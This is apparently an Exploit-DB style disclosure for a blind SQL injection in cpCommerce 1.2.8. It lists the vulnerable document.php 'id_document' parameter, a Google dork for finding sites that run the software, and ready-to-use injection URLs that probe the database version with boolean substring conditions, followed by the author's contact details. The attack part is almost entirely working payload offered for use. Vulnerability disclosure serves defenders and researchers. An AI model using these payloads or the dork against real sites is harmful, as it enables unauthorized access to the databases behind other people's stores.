# Exploit Title: cpCommerce 1.2.8 'id_document' Blind SQL Injection
# Date: 2020-05-09
# Author: Milad Karimi
# Contact: miladgrayhat@gmail.com
# Google Dork: intext:"Powered by cpcommerce"
# Version: 1.2.8
# Tested on: windows 10 , firefox
# CVE : CWE-89
Vulnerable file
document.php
Exploit
http://localhost/[path]/document.php?id_document=[SQL]
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5
************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : miladkarimi311@yahoo.com Email: miladgrayhat@gmail.com
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************